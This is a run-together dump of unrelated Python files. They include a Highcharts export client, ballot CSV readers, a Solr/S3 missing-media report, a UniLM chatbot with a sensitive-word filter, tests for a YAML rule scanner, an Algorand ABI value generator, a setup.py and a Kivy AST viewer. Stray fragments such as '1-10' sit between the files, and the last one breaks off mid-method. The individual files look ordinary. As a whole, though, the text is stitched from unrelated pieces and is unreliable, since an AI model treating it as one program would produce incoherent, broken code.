bin/highcharts_loader.py import json from base64 import b64encode import requests class EmptyParams(Exception): pass class ToManyParams(Exception): pass class Options: data = {} def __init__(self, *, from_file=None, from_dict=None): if not from_file and not from_dict: raise EmptyParams('You should pass "from_file" or "from_dict" param.') if from_file and from_dict: raise ToManyParams('You should pass only one param: "from_file" or "from_dict".') self.data = json.loads(open(from_file).read()) if from_file else from_dict class ChartLoader: raw_chart_data = None url = 'http://export.highcharts.com/' image_type = None def __init__(self, options: Options, image_type='image/png'): self.image_type = image_type response = requests.post(self.url, data={ 'type': image_type, 'options': json.dumps(options.data) }) if response.status_code == requests.codes.ok: self.raw_chart_data = response.content else: response.raise_for_status() def _decoded_chart(self): return b64encode(self.raw_chart_data).decode() def get_data_image(self): return 'data:image/{0};charset=utf-8;base64,{1}'.format(self.image_type, self._decoded_chart()) def get_raw_data(self): return self.raw_chart_data def save_to_file(self, path): f = open(path, 'wb+') f.write(self.raw_chart_data) f.close() 1-10 import gzip from csv import DictReader, DictWriter from itertools import groupby from typing import Iterator, TextIO from ranked_vote.ballot import Ballot, parse_choice def read_ballots_fh(fh: TextIO) -> Iterator[Ballot]: reader = DictReader(fh) for ballot_id, rows in groupby(reader, lambda x: x['ballot_id']): choices = [parse_choice(row['choice']) for row in rows] yield Ballot(ballot_id, choices) def write_ballots_fh(fh: TextIO, ballots: Iterator[Ballot]): writer = DictWriter(fh, ['ballot_id', 'rank', 'choice'], 
lineterminator='\n') writer.writeheader() for ballot in ballots: for rank, choice in enumerate(ballot.choices, 1): writer.writerow({ 'ballot_id': ballot.ballot_id, 'rank': rank, 'choice': str(choice) }) def read_ballots(filename: str) -> Iterator[Ballot]: if filename.endswith('.gz'): fh = gzip.open(filename, 'rt') else: fh = open(filename, 'r') yield from read_ballots_fh(fh) fh.close() def write_ballots(filename: str, ballots: Iterator[Ballot]): if filename.endswith('.gz'): fh = gzip.open(filename, 'wt', encoding='UTF-8') else: fh = open(filename, 'w') write_ballots_fh(fh, ballots) fh.close() setup-for-swig.py10-100 from distutils.core import setup, Extension setup( ext_modules = [ Extension("_hello", sources=["hello.c", "hello.i"]) ] ) import sys import os try: import configparser except: import ConfigParser as configparser import logging # import json import datetime import argparse import csv import boto3 from get_solr_json import get_solr_json logger = logging.getLogger(__name__) logger.setLevel(logging.DEBUG) def get_solr_docs(solr_url, api_key, query=None): '''Get just the documents for a given query''' cursorMark = '*' if not query: query = { 'q': 'structmap_url:[* TO *]', 'fl': 'id, structmap_url, collection_url, type_ss', 'rows': 1000, 'cursorMark': cursorMark, 'sort': 'id asc' } docs = [] num_read = 0 solr_json = get_solr_json(solr_url, query, api_key=api_key) while len(solr_json['response']['docs']) > 0: cursorMark = solr_json['nextCursorMark'] query['cursorMark'] = cursorMark docs.extend(solr_json['response']['docs']) num_read += len(solr_json['response']['docs']) if (num_read % 5000) == 0: logger.info(num_read) solr_json = get_solr_json(solr_url, query, api_key=api_key) return docs def get_summary_objects(s3, bucket, prefix): bucket = s3.Bucket(bucket) return bucket.objects.filter(Prefix=prefix) def get_media_json_keys(s3): # gather list of media json files "keys" # keys will be 'media_json/-media.json' media_json_object_summaries = get_summary_objects( s3, 'static.ucldc.cdlib.org', 'media_json') media_json_keys = [] count = 0 for objsum in media_json_object_summaries: count += 1 if (count % 5000) == 0: logger.info(count) media_json_keys.append(objsum.key) return media_json_keys # this was REALLY slow # obj_summary = s3.ObjectSummary(bucket, '{}/{}'.format(folder, key)) # try: # obj_summary.size # except botocore.exceptions.ClientError as e: # logger.info('missing media: {}'.format(row)) # missing_media.append(row) def missing_media_json(s3, solr_docs): missing_media = [] count = 0 media_json_keys = get_media_json_keys(s3) for row in solr_docs: count += 1 bucket, folder, key = row['structmap_url'].rsplit('/', 2) s3key = '{}/{}'.format(folder, key) if s3key not in media_json_keys: if (len(missing_media) % 1000) == 0: logger.info('{} bad so far'.format(len(missing_media))) missing_media.append(row) return missing_media def get_jp2000_file_sizes(s3): '''Get the sizes and UUID for all of the jp2000 files on s3 Return a dictionary indexed by UUID''' jp2000_object_summaries = get_summary_objects(s3, 'ucldc-private-files', 'jp2000') uuid_sizes = {} for objsum in jp2000_object_summaries: folder, UUID = objsum.key.rsplit('/', 1) uuid_sizes[UUID] = objsum.size return uuid_sizes def get_missing_jp2000_docs(s3, solr_docs): ''' Build a list of all the docs with missing or 0 size jp2000 ''' uuid_sizes = get_jp2000_file_sizes(s3) problems = [] for doc in solr_docs: if doc.get('type_ss') != ['image']: continue UUID = doc['id'] if not uuid_sizes.get(UUID): if uuid_sizes.get(UUID) is None: 
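# UUID is absent from the jp2000 listing entirely; use -1 to distinguish "missing" from a zero-byte file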
doc['size'] = -1 else: doc['size'] = uuid_sizes[UUID] if (len(problems) % 1000) == 0: logger.info('{} jp2000s bad so far'.format(len(problems))) problems.append(doc) return problems def main(argv=None): parser = argparse.ArgumentParser() parser.add_argument( '--outdir', default='reports', help='out directory for reports (defaults to reports)') parser.add_argument( '--inisection', default='new-index', help='section of report.ini to get Solr server info') if argv is None: argv = parser.parse_args() config = configparser.SafeConfigParser() config.read('report.ini') solr_url = config.get(argv.inisection, 'solrUrl') api_key = config.get(argv.inisection, 'solrAuth') print('SOLR: {}'.format(solr_url)) nuxeo_solr_docs = get_solr_docs(solr_url, api_key) #with open('nuxeo_solr_docs.json', 'w') as foo: # json.dump(nuxeo_solr_docs, foo, indent=2) print('\n\n{} nuxeo objects in Solr\n\n'.format(len(nuxeo_solr_docs))) print('\n\nGet object list from S3\n\n') s3 = boto3.resource('s3') media_json_keys = get_media_json_keys(s3) print('\n\nTotal number of media_json in s3:' '{}\n\n'.format(len(media_json_keys))) missing_media = missing_media_json(s3, nuxeo_solr_docs) missing_media_sorted = sorted( missing_media, key=lambda x: x['collection_url']) print('{} missing media_json files'.format(len(missing_media_sorted))) #with open('missing_media.json', 'w') as foo: # json.dump(missing_media_sorted, foo, indent=2) today = datetime.date.today() fileout = os.path.join(argv.outdir, '{}-{}-{}.csv'.format( today, 'missing-media-json', argv.inisection)) with open(fileout, 'w') as csvfile: writer = csv.writer(csvfile) for obj in missing_media_sorted: writer.writerow((obj['collection_url'], obj['id'], obj['structmap_url'], obj.get('type_ss'))) missing_jp2000 = get_missing_jp2000_docs(s3, nuxeo_solr_docs) missing_jp2000_sorted = sorted( missing_jp2000, key=lambda x: x['collection_url']) print('{} missing jp2000 files'.format(len(missing_jp2000_sorted))) #with open('missing_jp2000.json', 'w') as foo: # json.dump(missing_jp2000_sorted, foo, indent=2) fileout = os.path.join(argv.outdir, '{}-{}-{}.csv'.format( today, 'missing-jp2000', argv.inisection)) with open(fileout, 'w') as csvfile: writer = csv.writer(csvfile) for obj in missing_jp2000_sorted: writer.writerow( (obj['collection_url'], obj['id'], obj['structmap_url'], obj.get('type_ss'), obj['size'])) if __name__ == "__main__": sh = logging.StreamHandler() sh.setLevel(logging.DEBUG) logger.addHandler(sh) sys.exit(main()) """ @author: liucong @contact: @time: 2020/8/4 11:25 """ import torch import torch.nn.functional as F from tokenization_unilm import UnilmTokenizer from modeling_unilm import UnilmForSeq2SeqDecodeSample, UnilmConfig import copy import os import argparse import re from dirty_recognize import dirty_reg def remove_dirty_sentence(dirty_obj, sentence): if len(dirty_obj.match(sentence)) == 0: return False else: return True def remove_multi_symbol(text): r = re.compile(r'([.,,/\\#!!??。$%^&*;;::{}=_`´︵~()()-])[.,,/\\#!!??。$%^&*;;::{}=_`´︵~()()-]+') text = r.sub(r'\1', text) return text def top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')): assert logits.dim() == 1 top_k = min(top_k, logits.size(-1)) if top_k > 0: indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None] logits[indices_to_remove] = filter_value if top_p > 0.0: sorted_logits, sorted_indices = torch.sort(logits, descending=True) cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1) sorted_indices_to_remove = cumulative_probs > top_p 
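# shift the removal mask right by one so the first token that pushes the cumulative probability past top_p is still kept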
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone() sorted_indices_to_remove[..., 0] = 0 indices_to_remove = sorted_indices[sorted_indices_to_remove] logits[indices_to_remove] = filter_value return logits def main(): parser = argparse.ArgumentParser() parser.add_argument('--device', default='0', type=str, help='生成设备') parser.add_argument('--topk', default=3, type=int, help='取前k个词') parser.add_argument('--topp', default=0.95, type=float, help='取超过p的词') parser.add_argument('--dirty_path', default='data/dirty_words.txt', type=str, help='敏感词库') parser.add_argument('--model_name_or_path', default='kuakua_robot_model/', type=str, help='模型路径') parser.add_argument('--repetition_penalty', default=1.2, type=float, help="重复词的惩罚项") parser.add_argument('--max_len', type=int, default=32, help='生成的对话的最大长度') parser.add_argument('--no_cuda', type=bool, default=False, help='是否使用GPU进行预测') args = parser.parse_args() args.cuda = torch.cuda.is_available() and not args.no_cuda device = 'cuda' if args.cuda else 'cpu' print('using device:{}'.format(device)) os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID' os.environ["CUDA_VISIBLE_DEVICES"] = args.device config = UnilmConfig.from_pretrained(args.model_name_or_path, max_position_embeddings=512) tokenizer = UnilmTokenizer.from_pretrained(args.model_name_or_path, do_lower_case=False) model = UnilmForSeq2SeqDecodeSample.from_pretrained(args.model_name_or_path, config=config) model.to(device) model.eval() print('Chitchat Robot Starting') dirty_obj = dirty_reg(args.dirty_path) while True: try: text = input("user:") if remove_dirty_sentence(dirty_obj, text): print("chatbot:" + "换个话题聊聊吧。") continue input_ids = tokenizer.encode(text) token_type_ids = [4] * len(input_ids) generated = [] for _ in range(args.max_len): curr_input_ids = copy.deepcopy(input_ids) curr_input_ids.append(tokenizer.mask_token_id) curr_input_tensor = torch.tensor(curr_input_ids).long().to(device).view([1, -1]) curr_token_type_ids = copy.deepcopy(token_type_ids) curr_token_type_ids.extend([5]) curr_token_type_ids = torch.tensor(curr_token_type_ids).long().to(device).view([1, -1]) outputs = model(input_ids=curr_input_tensor, token_type_ids=curr_token_type_ids, attention_mask=None) next_token_logits = outputs[-1, -1, :] for id in set(generated): next_token_logits[id] /= args.repetition_penalty next_token_logits[tokenizer.convert_tokens_to_ids('[UNK]')] = -float('Inf') filtered_logits = top_k_top_p_filtering(next_token_logits, top_k=args.topk, top_p=args.topp) next_token = torch.multinomial(F.softmax(filtered_logits, dim=-1), num_samples=1) if next_token == tokenizer.sep_token_id: # 遇到[SEP]则表明生成结束 break generated.append(next_token.item()) input_ids.append(next_token.item()) token_type_ids.extend([5]) text = tokenizer.convert_ids_to_tokens(generated) text = remove_multi_symbol("".join(text)) if remove_dirty_sentence(dirty_obj, text): print("chatbot:" + "我要想一想。") else: print("chatbot:" + text) except: print("chatbot:" + "说点别的吧,好吗?") if __name__ == "__main__": main() # Copyright (C) 2016-Present Pivotal Software, Inc. All rights reserved. # # This program and the accompanying materials are made available under # the terms of the under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import os from ephemerol import Scanner class TestYAMLRules(unittest.TestCase): def setUp(self): Scanner.scan_results = [] def test_simple_rule_load(self): rule = """ - category: "Web Profile" app_type: java file_type: config refactor_rating: 0 description: "Web application config file" files: ["web.xml"] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase), "Should have loaded 1 rule") rule = Scanner.rulebase[0] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("web.xml", rule.file_name, "File Name should be mapped") def test_multiple_file_rule_load(self): rule = """ - category: "Web Profile" app_type: java file_type: config refactor_rating: 0 description: "Web application config file" files: - "web.xml" - "foo.barml" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("web.xml", rule.file_name, "File Name should be mapped") rule = Scanner.rulebase[1] self.assertEqual("Web Profile", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Web application config file", rule.description, "Description should be mapped") self.assertEqual("foo.barml", rule.file_name, "File Name should be mapped") def test_rule_load_with_replatform_advice(self): rule = """ - category: "JEE Config" app_type: java file_type: config refactor_rating: 1 replatform_advice: "Convert to Spring based application configuration" description: "JEE specific config file" files: - "application.xml" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("JEE Config", rule.file_category, "Category should be mapped") self.assertEqual("java", rule.app_type, "App Type should be mapped") self.assertEqual("config", rule.file_type, "File Type should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("Convert to Spring based application configuration", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("JEE specific config file", 
rule.description, "Description should be mapped") self.assertEqual("application.xml", rule.file_name, "File Name should be mapped") def test_rule_load_with_overriden_description_replatform_advice_refactor_rating(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 0 replatform_advice: "foo" description: "desc1" files: - "file1": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } - "file2" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertTrue(rule.file_name == "file1" or rule.file_name == "file2") if rule.file_name == "file1": found1 = True self.assertEqual("2", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc2", rule.description, "Description should be mapped") elif rule.file_name == "file2": found2 = True self.assertEqual("0", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("file2", rule.file_name, "File Name should be mapped") self.assertTrue(found1 and found2, "Should have found both file1 and file2") def test_rule_load_with_text_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: [ "pattern1" ] files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("pattern1", rule.text_pattern, "Text pattern should be mapped") def test_rule_load_with_multiple_text_patterns(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: [ "pattern1", "pattern2" ] files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True elif rule.text_pattern == "pattern2": found2 = True self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_multiple_text_patterns_with_override(self): rule = 
""" - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } files: [ "file1" ] """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2 = True self.assertEqual("desc2", rule.description, "Description should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_file_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" file_pattern: "*.file1" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(1, len(Scanner.rulebase)) rule = Scanner.rulebase[0] self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("*.file1", rule.file_name, "File name should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor Rating should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform Advice should be mapped") self.assertEqual("desc1", rule.description, "Description should be mapped") def test_rule_load_with_multiple_text_patterns_overrides_and_file_pattern(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } file_pattern: "*.file1" """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(2, len(Scanner.rulebase)) found1 = False found2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertEqual("*.file1", rule.file_name, "File name should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") if rule.text_pattern == "pattern1": found1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2 = True self.assertEqual("desc2", rule.description, "Description should be mapped") 
self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1 and found2, "Should have found pattern1 and pattern2") def test_rule_load_with_text_pattern_overriding_files_overriding_rule(self): rule = """ - category: "cat1" app_type: app1 file_type: type1 refactor_rating: 1 replatform_advice: "foo" description: "desc1" text_patterns: - "pattern1" - "pattern2": { description: "desc3", replatform_advice: "bap", refactor_rating: 3 } files: - "file1" - "file2": { description: "desc2", replatform_advice: "bar", refactor_rating: 2 } """ Scanner.load_yaml_rules_stream(rule) self.assertEqual(4, len(Scanner.rulebase)) found1and1 = False found1and2 = False found2and1 = False found2and2 = False for rule in Scanner.rulebase: self.assertEqual("cat1", rule.file_category, "Category should be mapped") self.assertEqual("app1", rule.app_type, "App Type should be mapped") self.assertEqual("type1", rule.file_type, "File Type should be mapped") self.assertTrue(rule.text_pattern == "pattern1" or rule.text_pattern == "pattern2") self.assertTrue(rule.file_name == "file1" or rule.file_name == "file2") if rule.file_name == "file1": if rule.text_pattern == "pattern1": found1and1 = True self.assertEqual("desc1", rule.description, "Description should be mapped") self.assertEqual("foo", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("1", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found1and2 = True self.assertEqual("desc3", rule.description, "Description should be mapped") self.assertEqual("bap", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("3", rule.refactor_rating, "Refactor rating should be mapped") elif rule.file_name == "file2": if rule.text_pattern == "pattern1": found2and1 = True self.assertEqual("desc2", rule.description, "Description should be mapped") self.assertEqual("bar", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("2", rule.refactor_rating, "Refactor rating should be mapped") elif rule.text_pattern == "pattern2": found2and2 = True self.assertEqual("desc3", rule.description, "Description should be mapped") self.assertEqual("bap", rule.replatform_advice, "Replatform advice should be mapped") self.assertEqual("3", rule.refactor_rating, "Refactor rating should be mapped") self.assertTrue(found1and1 and found1and2 and found2and1 and found2and2, "Should have found all 4 rule combos") def test_archive_scan_yaml(self): Scanner.load_yaml_rules(self.path_helper("rulebase.yml")) results_stats = Scanner.scan_archive(self.path_helper("SampleWebApp-master.zip")) self.assertEqual(97.44, results_stats.cloud_readiness_index) # Helps allow resources to be resolved if running via py.test or directly in IDE def path_helper(self, file_name): archive = os.path.join("ephemerol", "test", file_name) if not os.path.isfile(archive): archive = file_name return archive if __name__ == '__main__': unittest.main() graviton/abi_strategy.py1-10 """ Inspired by Hypothesis' Strategies. TODO: Leverage Hypothesis! 
""" from collections import OrderedDict import random import string from typing import Callable, Dict, List, Optional, Union, cast from algosdk import abi, encoding PY_TYPES = Union[bool, int, list, str, bytes] class ABIStrategy: DEFAULT_DYNAMIC_ARRAY_LENGTH = 3 STRING_CHARS = string.digits + string.ascii_letters + string.punctuation seeded_randomness: bool = False random_seed: int @classmethod def seed_randomness(cls, random_seed: int = 42): """ If you never call this function, there won't be a specific random seed. """ if cls.seeded_randomness: print(f"already seeded with seed {cls.random_seed}") return cls.random_seed = random_seed random.seed(cls.random_seed) cls.seeded_randomness = True def __init__(self, abi_instance: abi.ABIType, dynamic_length: Optional[int] = None): assert isinstance( abi_instance, abi.ABIType ), f"expected abi_type but got {abi_instance} of type {type(abi_instance)}" assert dynamic_length is None or isinstance( dynamic_length, int ), f"expected dynamic_length to be an int but was given {type(dynamic_length)}" self.abi_type: abi.ABIType = abi_instance self.dynamic_length: Optional[int] = dynamic_length def get_random(self) -> Union[bool, int, list, str, bytes]: if isinstance(self.abi_type, abi.UfixedType): raise NotImplementedError( f"Currently cannot get a random sample for {self.abi_type}" ) if isinstance(self.abi_type, abi.BoolType): return random.choice([True, False]) if isinstance(self.abi_type, abi.UintType): return random.randint(0, (1 << self.abi_type.bit_size) - 1) if isinstance(self.abi_type, abi.ByteType): return ABIStrategy(abi.UintType(8)).get_random() if isinstance(self.abi_type, abi.TupleType): return [ ABIStrategy(child_type).get_random() for child_type in self.abi_type.child_types ] if isinstance(self.abi_type, abi.ArrayStaticType): return [ ABIStrategy(self.abi_type.child_type).get_random() for _ in range(self.abi_type.static_length) ] if isinstance(self.abi_type, abi.AddressType): return encoding.encode_address( bytearray( cast( List[int], ABIStrategy( abi.ArrayStaticType( abi.ByteType(), self.abi_type.byte_len() ) ).get_random(), ) ) ) dynamic_range = range( self.DEFAULT_DYNAMIC_ARRAY_LENGTH if self.dynamic_length is None else self.dynamic_length ) if isinstance(self.abi_type, abi.ArrayDynamicType): return [ ABIStrategy(self.abi_type.child_type).get_random() for _ in dynamic_range ] if isinstance(self.abi_type, abi.StringType): return "".join(random.choice(self.STRING_CHARS) for _ in dynamic_range) raise ValueError(f"Unexpected abi_type {self.abi_type}") def map( self, waterfall: Dict[abi.ABIType, Callable[..., PY_TYPES]], *args, **kwargs, ) -> PY_TYPES: for abi_type, call in waterfall.items(): if isinstance(self.abi_type, abi_type): return call(*args, **kwargs) return waterfall["DEFAULT"](*args, **kwargs) def mutate_for_roundtrip(self, py_abi_instance: PY_TYPES) -> PY_TYPES: def not_implemented(_): raise NotImplementedError(f"Currently cannot handle type {self.abi_type}") def unexpected_type(_): raise ValueError(f"Unexpected abi_type {self.abi_type}") def address_logic(x): y = encoding.decode_address(x) return encoding.encode_address( bytearray( ABIStrategy( abi.ArrayStaticType(abi.ByteType(), len(y)) ).mutate_for_roundtrip(y) ) ) waterfall = OrderedDict( [ (abi.UfixedType, not_implemented), (abi.BoolType, lambda x: not x), (abi.UintType, lambda x: (1 << self.abi_type.bit_size) - 1 - x), ( abi.ByteType, lambda x: ABIStrategy(abi.UintType(8)).mutate_for_roundtrip(x), ), ( abi.TupleType, lambda x: [ 
ABIStrategy(child_type).mutate_for_roundtrip(x[i]) for i, child_type in enumerate(self.abi_type.child_types) ], ), ( abi.ArrayStaticType, lambda x: [ ABIStrategy(self.abi_type.child_type).mutate_for_roundtrip(y) for y in x ], ), (abi.AddressType, address_logic), ( abi.ArrayDynamicType, lambda x: [ ABIStrategy(self.abi_type.child_type).mutate_for_roundtrip(y) for y in x ], ), (abi.StringType, lambda x: "".join(reversed(x))), ("DEFAULT", unexpected_type), ] ) return self.map(waterfall, py_abi_instance) # encoding: utf-8 # (c) 2017-2021 Open Risk (https://www.openriskmanagement.com) # # concentrationMetrics is licensed under the Apache 2.0 license a copy of which is included # in the source distribution of concentrationMetrics. This is notwithstanding any licenses of # third-party software included in this distribution. You may not use this file except in # compliance with the License. # # Unless required by applicable law or agreed to in writing, software distributed under # the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific language governing permissions and # limitations under the License. from codecs import open from setuptools import setup __version__ = '0.5.1' ver = __version__ setup( name='concentrationMetrics', version=ver, packages=['concentrationMetrics', 'datasets', 'examples.python'], url='https://github.com/open-risk/concentrationMetrics', download_url='https://github.com/open-risk/concentrationMetrics/archive/v_0.5.0.tar.gz', license='The MIT License (MIT)', author='Open Risk', author_email='', description='A python library for the computation of various concentration, inequality and diversity indices', install_requires=[ 'numpy', 'pandas', 'scipy', 'networkx', 'pytest' ], include_package_data=True, zip_safe=False, provides=['concentrationMetrics'], keywords=['concentration', 'diversity', 'inequality', 'index'], classifiers=[ 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'Intended Audience :: Financial and Insurance Industry', 'Development Status :: 3 - Alpha', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3 :: Only', 'Programming Language :: Python :: 3.6', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Information Analysis' ] ) 0 YEAR_TO_MINUTES = 60 * 24 * 365 MONTH_TO_MINUTES = 60 * 24 * 30 import sys from time import time import kivy from kivy.clock import Clock kivy.require('1.8.1') from kivy.app import App from kivy.lang import Builder from kivy.uix.treeview import TreeViewLabel from kivy.properties import StringProperty, ObjectProperty from kivy.logger import Logger from kvlang.observer import ASTObserver root_kv = ''' : markup: True text: '%s [color=666666][%s][/color]' % (self.rule_text, self.rule_type) BoxLayout: orientation: 'vertical' Label: size_hint_y: None height: '24sp' text: 'AST for {}' BoxLayout: size_hint_y: None height: '24sp' canvas.before: Color: rgba: 0.3, 0.3, 0.3, 1 Rectangle: pos: self.pos size: self.size FloatLayout: Label: text: 'Source' size_hint: 1, 1 pos: self.parent.pos ToggleButton: id: source_edit text: 'Edit' size_hint: None, None width: self.texture_size and (self.texture_size[0] + 24) height: self.parent.height - 8 y: self.parent.y + 4 x: self.parent.x + 8 Label: text: 'AST' Label: text: 'Output' BoxLayout: ScrollView: id: sv_source_text TextInput: id: source_text size_hint_y: None height: max(self.minimum_height, 
sv_source_text.height) readonly: source_edit.state == 'normal' BoxLayout: orientation: 'vertical' BoxLayout: orientation: 'horizontal' size_hint_y: None height: sp(64) Button: id: btn_moveup text: '^' Button: id: btn_movedown text: 'v' Button: id: btn_addprop text: '+' Button: id: btn_removenode text: '-' ScrollView: TreeView: id: treeview hide_root: True height: self.minimum_height size_hint_y: None ScrollView: id: sv_output_text TextInput: id: output_text size_hint_y: None height: max(self.minimum_height, sv_output_text.height) readonly: True ''' class AstNode(TreeViewLabel): rule_text = StringProperty() rule_type = StringProperty() tree_node = ObjectProperty() def cleartreeview(tree_view): nodes = list(tree_view.iterate_all_nodes()) for node in nodes: tree_view.remove_node(node) def buildtreeview(tree, tree_view): start_time = time() parent = None cleartreeview(tree_view) populatetreeview(tree_view, parent, tree, True) finish_time = time() Logger.debug('kvAst: tree built in %0.4fs' % (finish_time - start_time)) def populatetreeview(tree_view, parent, tree, is_open=False): tree_node = parent if not tree.isNil(): rule_type = type(tree).__name__ if rule_type.endswith('Node'): rule_type = rule_type[:-4] tree_node = tree_view.add_node(AstNode(rule_text=str(tree), rule_type=rule_type, tree_node=tree, is_open=is_open), parent) for child in tree.getChildren(): populatetreeview(tree_view, tree_node, child, is_open=is_open) class AstApp(App): def __init__(self, filename): super(AstApp, self).__init__() self.ast_file = filename self.ast = ASTObserver() self.selected = None def build(self): root = Builder.load_string(root_kv.format(self.ast_file)) st = root.ids.source_text self.ast.bind(source=st.setter('text')) 